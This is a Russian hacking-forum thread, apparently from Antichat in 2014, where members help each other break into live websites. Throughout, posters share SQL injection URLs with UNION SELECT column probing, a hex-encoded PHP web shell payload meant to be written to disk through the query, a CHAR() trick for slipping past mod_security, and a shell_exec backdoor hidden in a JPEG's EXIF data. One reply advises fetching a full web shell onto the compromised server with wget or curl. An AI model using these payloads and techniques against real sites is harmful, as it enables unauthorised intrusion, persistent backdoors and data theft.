 |
|
21.08.2014, 12:06
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Сообщение от winstrool
сам шелл нужно хексить
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение что какоето ограничение на кол-во символов в запросе
|
|
|
21.08.2014, 12:40
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Evil_Genius
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение что какоето ограничение на кол-во символов в запросе
Такое ощущение, что нужно угадывать, что именно вы там делаете, давайте урл посмотрим, иначе курите мануалы!
|
|
|
|
21.08.2014, 16:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Evil_Genius
Привет!
Делаю запрос
site.ru/index.php?id=-14+union+select+file_priv,2+from+mysql.user+where+ user='root'
На что выдает
Y Unknown column 'id' in 'where clause'
Далее пытаюсь залить шелл
На что выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1
Как правильно составить запрос, чтобы не выскакивала ошибка?
Сообщение от None
Захексил, выполнил запрос и вот что выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d64 5d29' at line 1
Такое ощущение, что вы копируете сюда не те запросы, которые выполняете.
По первому:
1) У рута file_priv есть по умолчанию.
2) Колонки id в mysql.user нет.
3) Если запрос таки правильный, вставьте комментарий в конец.
По второму:
1) Действительно, копируйте запрос.
2) Если ограничение на длину, проверьте простым вписыванием длинной строки в хексе.
3) Ошибка синтаксиса - это все еще ошибка синтаксиса. Начните с запроса, который выполняется корректно, а потом доводите до шелла.
|
|
|
|
21.08.2014, 19:54
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Привет
вопрос по MSSQL2000 with error:
....../xyz.asp?param=99%27
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99'' to a column of data type int.
Но
....../xyz.asp?param=99%20AND%201=1
возвращает
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99 and 1=1' to a column of data type int.
можно что-то сделать? или тут не сможем повлиять на исполнение запроса? |
|
|
|
21.08.2014, 22:22
|
|
Флудер
Регистрация: 02.04.2011
Сообщений: 2,531
С нами:
7954166
Репутация:
99
|
|
на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?
|
|
|
|
21.08.2014, 22:44
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от GAiN
на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: /'[/COLOR][COLOR="#007700"]);
exit;
}
[/COLOR][/COLOR]
|
|
|
|
22.08.2014, 14:55
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
С нами:
7180886
Репутация:
0
|
|
есть скуля.
1.подбирал кол-во полей - 18
Код:
site.com/index.php?id=15+order+by+18+--+
2.Пытаюсь узнать принтабельное поле
Код:
site.com/index.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
3. срабатывает mod security. "select" загоняю в char
Код:
site.com/index.php?id=15+union+CHAR(115, 101, 108, 101, 99, 116)+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
возращает такую ошибку:
Сообщение от None
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /***/****public_html/xjax/xjax.php on line 227
No Products Found
что с этим делать? |
|
|
|
22.08.2014, 15:09
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от erwap
что с этим делать?
гуглить "mod_security bypass"
|
|
|
|
24.08.2014, 03:23
|
|
Новичок
Регистрация: 21.11.2010
Сообщений: 7
С нами:
8144246
Репутация:
0
|
|
долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"r0ng"[/COLOR][COLOR="#007700"]]);}[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
..
Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста |
|
|
|
24.08.2014, 08:19
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от FieryDragon
долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shell_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"r0ng"[/COLOR][COLOR="#007700"]]);}[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
..
Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
